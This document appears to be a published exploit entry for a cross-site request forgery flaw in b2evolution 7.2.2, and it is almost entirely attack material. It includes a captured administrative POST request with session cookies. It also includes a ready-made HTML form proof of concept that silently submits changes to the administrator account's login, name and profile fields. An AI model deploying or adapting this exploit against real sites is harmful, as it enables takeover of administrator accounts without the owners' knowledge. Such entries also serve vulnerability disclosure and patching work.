# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel (@alpernae) # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/7-2-2 # Version : 7.2.2 # Tested on: Kali Linux # Category: WebApp ######## Description ######## Allows to attacker change admin account details. ######## Proof of Concept ######## ===> REQUEST <==== POST /b2evolution/evoadm.php HTTP/1.1 Host: s2.demo.opensourcecms.com Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; __cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK- zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1031 Origin: https://s2.demo.opensourcecms.com Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ## < SNIPP > edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID= &edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D= &uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7= http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1 #### Proof-Of-Concept #### <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST"> <input type="hidden" name="edited&#95;user&#95;login" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;firstname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;lastname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;nickname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;gender" value="M" /> <input type="hidden" name="edited&#95;user&#95;ctry&#95;ID" value="233" /> <input type="hidden" name="edited&#95;user&#95;rgn&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;subrg&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;city&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;min" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;max" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;month" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;day" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;year" value="" /> <input type="hidden" name="organizations&#91;&#93;" value="1" /> <input type="hidden" name="org&#95;roles&#91;&#93;" value="King&#32;of&#32;Spades" /> <input type="hidden" name="org&#95;priorities&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;1" value="I&#32;am&#32;the&#32;demo&#32;administrator&#32;of&#32;this&#32;site&#46;&#13;&#10;I&#32;love&#32;having&#32;so&#32;much&#32;power&#33;" /> <input type="hidden" name="uf&#95;new&#91;2&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;new&#91;3&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;2" value="https&#58;&#47;&#47;twitter&#46;com&#47;b2evolution&#47;" /> <input type="hidden" name="uf&#95;3" value="https&#58;&#47;&#47;www&#46;facebook&#46;com&#47;b2evolution" /> <input type="hidden" name="uf&#95;4" value="https&#58;&#47;&#47;plus&#46;google&#46;com&#47;&#43;b2evolution&#47;posts" /> <input type="hidden" name="uf&#95;5" value="https&#58;&#47;&#47;www&#46;linkedin&#46;com&#47;company&#47;b2evolution&#45;net" /> <input type="hidden" name="uf&#95;6" value="https&#58;&#47;&#47;github&#46;com&#47;b2evolution&#47;b2evolution" /> <input type="hidden" name="uf&#95;7" value="http&#58;&#47;&#47;b2evolution&#46;net&#47;" /> <input type="hidden" name="new&#95;field&#95;type" value="0" /> <input type="hidden" name="actionArray&#91;update&#93;" value="Save&#32;Changes&#33;" /> <input type="hidden" name="crumb&#95;user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" /> <input type="hidden" name="ctrl" value="user" /> <input type="hidden" name="user&#95;tab" value="profile" /> <input type="hidden" name="identity&#95;form" value="1" /> <input type="hidden" name="user&#95;ID" value="1" /> <input type="hidden" name="orig&#95;user&#95;ID" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>